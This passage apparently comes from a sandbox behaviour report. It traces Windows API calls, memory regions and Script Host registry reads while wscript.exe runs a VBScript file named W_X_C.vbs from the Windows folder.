(i=5) returned 0x1900015 [0136.101] GetStockObject (i=13) returned 0x18a002e [0136.101] GetDC (hWnd=0x0) returned 0x7010bf5 [0136.189] GetTextExtentPointA (in: hdc=0x7010bf5, lpString="0", c=1, lpsz=0x28f9dc | out: lpsz=0x28f9dc) returned 1 [0136.192] GetDeviceCaps (hdc=0x7010bf5, index=14) returned 1 [0136.192] GetDeviceCaps (hdc=0x7010bf5, index=12) returned 32 [0136.192] GetDeviceCaps (hdc=0x7010bf5, index=88) returned 96 [0136.192] GetDeviceCaps (hdc=0x7010bf5, index=90) returned 96 [0136.192] GetDeviceCaps (hdc=0x7010bf5, index=38) returned 32409 [0136.192] ReleaseDC (hWnd=0x0, hDC=0x7010bf5) returned 1 [0136.282] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0xe90000 [0136.283] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x76da66bc) returned 0x0 [0136.283] GetCurrentThreadId () returned 0xa98 Process: id = "8" image_name = "wscript.exe" filename = "c:\\windows\\syswow64\\wscript.exe" page_root = "0x3243c000" os_pid = "0xb6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xfe0" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Windows\\W_X_C.vbs\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1452 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1453 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1454 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1455 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1456 start_va = 0xd0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1457 start_va = 0x2f0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1458 start_va = 0x7f0000 end_va = 0x815fff monitored = 1 entry_point = 0x7f2f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 1459 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1460 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1461 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1462 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1463 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1464 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1465 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1466 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1467 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1468 start_va = 0x5e0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1469 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1470 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1471 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1472 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1473 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1474 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1475 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1476 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1477 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1478 start_va = 0x820000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1479 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1480 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1481 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1482 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1483 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1484 start_va = 0x60000 end_va = 0xc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1485 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1486 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1487 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1488 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1489 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1490 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1491 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1492 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1493 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1494 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1495 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1496 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1497 start_va = 0x745b0000 end_va = 0x745b8fff monitored = 0 entry_point = 0x745b1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1498 start_va = 0x110000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1499 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1500 start_va = 0x140000 end_va = 0x2c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1501 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1502 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1503 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1504 start_va = 0x3f0000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1505 start_va = 0xb10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 1506 start_va = 0x20000 end_va = 0x22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wscript.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wscript.exe.mui") Region: id = 1507 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1508 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1509 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1510 start_va = 0x744d0000 end_va = 0x7454ffff monitored = 0 entry_point = 0x744e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1511 start_va = 0x820000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1512 start_va = 0xa10000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1513 start_va = 0x660000 end_va = 0x73efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1514 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1515 start_va = 0x840000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1516 start_va = 0x980000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1517 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1518 start_va = 0x1f10000 end_va = 0x21defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1519 start_va = 0x120000 end_va = 0x12efff monitored = 1 entry_point = 0x122f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 1520 start_va = 0x72ec0000 end_va = 0x72f1efff monitored = 0 entry_point = 0x72ec2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1521 start_va = 0x22b0000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 1522 start_va = 0x2330000 end_va = 0x242ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1523 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1524 start_va = 0x74490000 end_va = 0x744a2fff monitored = 0 entry_point = 0x74491d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1525 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1526 start_va = 0x77450000 end_va = 0x774d2fff monitored = 0 entry_point = 0x774523d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1527 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 1528 start_va = 0x72c10000 end_va = 0x72c7afff monitored = 1 entry_point = 0x72c11409 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll") Region: id = 1529 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "w_x_c.vbs" filename = "\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs") Region: id = 1530 start_va = 0x75b90000 end_va = 0x75bbefff monitored = 0 entry_point = 0x75b92a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1531 start_va = 0x75830000 end_va = 0x75950fff monitored = 0 entry_point = 0x7583158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1532 start_va = 0x773f0000 end_va = 0x773fbfff monitored = 0 entry_point = 0x773f238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1533 start_va = 0x74380000 end_va = 0x74396fff monitored = 0 entry_point = 0x74383573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1534 start_va = 0x740000 end_va = 0x77bfff monitored = 0 entry_point = 0x74128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1535 start_va = 0x740000 end_va = 0x77bfff monitored = 0 entry_point = 0x74128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1536 start_va = 0x740000 end_va = 0x77bfff monitored = 0 entry_point = 0x74128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1537 start_va = 0x740000 end_va = 0x77bfff monitored = 0 entry_point = 0x74128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1538 start_va = 0x740000 end_va = 0x77bfff monitored = 0 entry_point = 0x74128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1539 start_va = 0x74340000 end_va = 0x7437afff monitored = 0 entry_point = 0x7434128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1540 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "w_x_c.vbs" filename = "\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs") Region: id = 1541 start_va = 0x2230000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1542 start_va = 0x2610000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 1543 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1544 start_va = 0x753f0000 end_va = 0x753f7fff monitored = 0 entry_point = 0x753f3bf5 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll") Region: id = 1545 start_va = 0x2710000 end_va = 0x2b0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 1546 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "w_x_c.vbs" filename = "\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs") Region: id = 1547 start_va = 0x9d0000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1548 start_va = 0x2ba0000 end_va = 0x2c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1549 start_va = 0x753d0000 end_va = 0x753e5fff monitored = 1 entry_point = 0x753d13df region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll") Region: id = 1550 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1551 start_va = 0x75410000 end_va = 0x75493fff monitored = 0 entry_point = 0x754119a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1552 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1553 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1554 start_va = 0x2430000 end_va = 0x256ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 1556 start_va = 0x72940000 end_va = 0x7296cfff monitored = 1 entry_point = 0x72941351 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\SysWOW64\\scrobj.dll" (normalized: "c:\\windows\\syswow64\\scrobj.dll") Region: id = 1557 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1558 start_va = 0x2430000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 1559 start_va = 0x2560000 end_va = 0x256ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1560 start_va = 0x72910000 end_va = 0x72930fff monitored = 1 entry_point = 0x7291e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 1561 start_va = 0x728f0000 end_va = 0x72901fff monitored = 0 entry_point = 0x728f1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1562 start_va = 0x75390000 end_va = 0x753b9fff monitored = 0 entry_point = 0x753913f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1563 start_va = 0x5d0000 end_va = 0x5dbfff monitored = 1 entry_point = 0x5de356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Thread: id = 64 os_tid = 0xbcc [0140.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ef8b0 | out: lpSystemTimeAsFileTime=0x3ef8b0*(dwLowDateTime=0x555bbe0, dwHighDateTime=0x1da9885)) [0140.890] GetCurrentProcessId () returned 0xb6c [0140.890] GetCurrentThreadId () returned 0xbcc [0140.890] GetTickCount () returned 0x1d0c1e1 [0140.890] QueryPerformanceCounter (in: lpPerformanceCount=0x3ef8a8 | out: lpPerformanceCount=0x3ef8a8*=3062171827441) returned 1 [0140.890] GetStartupInfoA (in: lpStartupInfo=0x3ef8c4 | out: lpStartupInfo=0x3ef8c4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0140.890] GetModuleHandleA (lpModuleName=0x0) returned 0x7f0000 [0140.890] GetModuleHandleA (lpModuleName=0x0) returned 0x7f0000 [0140.891] GetVersionExA (in: lpVersionInformation=0x3ef7d4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1000000, dwMinorVersion=0x3ef724, dwBuildNumber=0x0, dwPlatformId=0x3ef944, szCSDVersion="Í\x1e­wb(Î\x01þÿÿÿ£<©wÎ<©wD") | out: lpVersionInformation=0x3ef7d4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0140.891] GetUserDefaultLCID () returned 0x409 [0140.892] CoInitialize (pvReserved=0x0) returned 0x0 [0141.023] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Windows\\W_X_C.vbs\" " [0141.023] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Windows\\W_X_C.vbs\" ") returned 57 [0141.023] ??2@YAPAXI@Z () returned 0x1312b0 [0141.023] ??2@YAPAXI@Z () returned 0x131330 [0141.023] GetCurrentThreadId () returned 0xbcc [0141.023] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef5e4 | out: phkResult=0x3ef5e4*=0xa0) returned 0x0 [0141.024] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef5e8 | out: phkResult=0x3ef5e8*=0xa4) returned 0x0 [0141.038] RegQueryValueExW (in: hKey=0xa4, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x3ee998, lpData=0x3ee99c, lpcbData=0x3ee994*=0x400 | out: lpType=0x3ee998*=0x0, lpData=0x3ee99c*=0x0, lpcbData=0x3ee994*=0x400) returned 0x2 [0141.038] RegQueryValueExW (in: hKey=0xa0, lpValueName="Enabled", lpReserved=0x0, lpType=0x3ee998, lpData=0x3ee99c, lpcbData=0x3ee994*=0x400 | out: lpType=0x3ee998*=0x0, lpData=0x3ee99c*=0x0, lpcbData=0x3ee994*=0x400) returned 0x2 [0141.038] RegQueryValueExW (in: hKey=0xa4, lpValueName="Enabled", lpReserved=0x0, lpType=0x3ee998, lpData=0x3ee99c, lpcbData=0x3ee994*=0x400 | out: lpType=0x3ee998*=0x0, lpData=0x3ee99c*=0x0, lpcbData=0x3ee994*=0x400) returned 0x2 [0141.039] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0141.280] RegCloseKey (hKey=0xa4) returned 0x0 [0141.280] RegCloseKey (hKey=0xa0) returned 0x0 [0141.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef3b4 | out: phkResult=0x3ef3b4*=0xa0) returned 0x0 [0141.281] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef3b0 | out: phkResult=0x3ef3b0*=0xa4) returned 0x0 [0141.281] RegQueryValueExW (in: hKey=0xa4, lpValueName="IgnoreUserSettings", 